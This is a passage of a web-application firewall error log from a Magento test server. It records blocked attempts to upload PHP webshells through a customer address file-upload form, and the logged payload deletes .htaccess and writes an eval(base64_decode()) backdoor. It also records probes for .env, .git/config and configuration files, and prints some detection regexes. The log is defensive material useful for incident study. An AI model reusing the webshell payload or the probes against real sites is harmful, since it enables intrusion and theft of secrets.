409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.phar"] [unique_id "aUn_d4NeZfPRtoEjKvE7NAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:27.966962 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.phar"] [unique_id "aUn_d4NeZfPRtoEjKvE7NAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:27.967191 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.phar"] [unique_id "aUn_d4NeZfPRtoEjKvE7NAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:28.316392 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: sa88364f428d25.php8 found within FILES:custom_attributes[country_id]: sa88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUn_eINeZfPRtoEjKvE7NQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/a/sa88364f428d25.phar
[Tue Dec 23 03:33:28.317083 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUn_eINeZfPRtoEjKvE7NQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/a/sa88364f428d25.phar
[Tue Dec 23 03:33:28.317275 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUn_eINeZfPRtoEjKvE7NQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/a/sa88364f428d25.phar
[Tue Dec 23 03:33:29.090243 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Rule 7fb645375be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.php8"] [unique_id "aUn_eYNeZfPRtoEjKvE7NgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:29.090704 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.php8"] [unique_id "aUn_eYNeZfPRtoEjKvE7NgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:29.093103 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.php8"] [unique_id "aUn_eYNeZfPRtoEjKvE7NgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:29.093280 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.php8"] [unique_id "aUn_eYNeZfPRtoEjKvE7NgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 10:54:49.633353 2025] [:error] [pid 922053] [client 139.64.164.4:36500] [client 139.64.164.4] ModSecurity: Warning. Matched phrase "config.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: config.yml found within ARGS:file: app/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUpm6drFNKKYU-HtVaVwuAAAAAY"]
[Tue Dec 23 10:54:49.633820 2025] [:error] [pid 922053] [client 139.64.164.4:36500] [client 139.64.164.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUpm6drFNKKYU-HtVaVwuAAAAAY"]
[Tue Dec 23 10:54:49.633995 2025] [:error] [pid 922053] [client 139.64.164.4:36500] [client 139.64.164.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUpm6drFNKKYU-HtVaVwuAAAAAY"]
[Tue Dec 23 21:39:53.312889 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Rule 7fb645375be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.phar"] [unique_id "aUr-GYNeZfPRtoEjKvE8NQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 21:39:53.313369 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.phar"] [unique_id "aUr-GYNeZfPRtoEjKvE8NQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 21:39:53.315784 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.phar"] [unique_id "aUr-GYNeZfPRtoEjKvE8NQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 21:39:53.315958 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.phar"] [unique_id "aUr-GYNeZfPRtoEjKvE8NQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 21:39:53.555784 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: wm88364f428d25.php8 found within FILES:custom_attributes[country_id]: wm88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUr-GYNeZfPRtoEjKvE8NgAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/m/wm88364f428d25.phar
[Tue Dec 23 21:39:53.556470 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUr-GYNeZfPRtoEjKvE8NgAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/m/wm88364f428d25.phar
[Tue Dec 23 21:39:53.556652 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUr-GYNeZfPRtoEjKvE8NgAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/m/wm88364f428d25.phar
[Tue Dec 23 21:39:53.770444 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Rule 7fb645375be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.php8"] [unique_id "aUr-GYNeZfPRtoEjKvE8NwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 21:39:53.770891 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.php8"] [unique_id "aUr-GYNeZfPRtoEjKvE8NwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 21:39:53.773201 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.php8"] [unique_id "aUr-GYNeZfPRtoEjKvE8NwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 21:39:53.773383 2025] [:error] [pid 920445] [client 91.84.106.190:48224] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/m/wm88364f428d25.php8"] [unique_id "aUr-GYNeZfPRtoEjKvE8NwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 06:32:08.002290 2025] [authz_core:error] [pid 942105] [client 64.226.65.160:42266] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 24 06:32:11.002675 2025] [:error] [pid 942141] [client 64.226.65.160:35400] [client 64.226.65.160] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUt624Paxlhb2LXaeAH_9AAAAAw"]
[Wed Dec 24 06:32:11.002909 2025] [:error] [pid 942141] [client 64.226.65.160:35400] [client 64.226.65.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUt624Paxlhb2LXaeAH_9AAAAAw"]
[Wed Dec 24 06:32:11.003055 2025] [:error] [pid 942141] [client 64.226.65.160:35400] [client 64.226.65.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUt624Paxlhb2LXaeAH_9AAAAAw"]
[Wed Dec 24 06:32:12.002646 2025] [:error] [pid 942100] [client 64.226.65.160:35412] [client 64.226.65.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUt63Pl7Z5lr6dAW68De5AAAAAE"]
[Wed Dec 24 06:32:12.002878 2025] [:error] [pid 942100] [client 64.226.65.160:35412] [client 64.226.65.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUt63Pl7Z5lr6dAW68De5AAAAAE"]
[Wed Dec 24 06:32:12.004033 2025] [:error] [pid 942100] [client 64.226.65.160:35412] [client 64.226.65.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUt63Pl7Z5lr6dAW68De5AAAAAE"]
[Wed Dec 24 06:32:14.002818 2025] [:error] [pid 942101] [client 64.226.65.160:35426] [client 64.226.65.160] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUt63o3b3LRkWYPRjITTlwAAAAI"]
[Wed Dec 24 06:32:14.003059 2025] [:error] [pid 942101] [client 64.226.65.160:35426] [client 64.226.65.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUt63o3b3LRkWYPRjITTlwAAAAI"]
[Wed Dec 24 06:32:14.003222 2025] [:error] [pid 942101] [client 64.226.65.160:35426] [client 64.226.65.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUt63o3b3LRkWYPRjITTlwAAAAI"]
[Wed Dec 24 09:32:51.540703 2025] [authz_core:error] [pid 942151] [client 139.59.136.184:34336] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 24 09:32:54.540989 2025] [:error] [pid 942140] [client 139.59.136.184:34370] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUulNoFODG4IWi8uxa11PAAAAAs"]
[Wed Dec 24 09:32:54.541213 2025] [:error] [pid 942140] [client 139.59.136.184:34370] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUulNoFODG4IWi8uxa11PAAAAAs"]
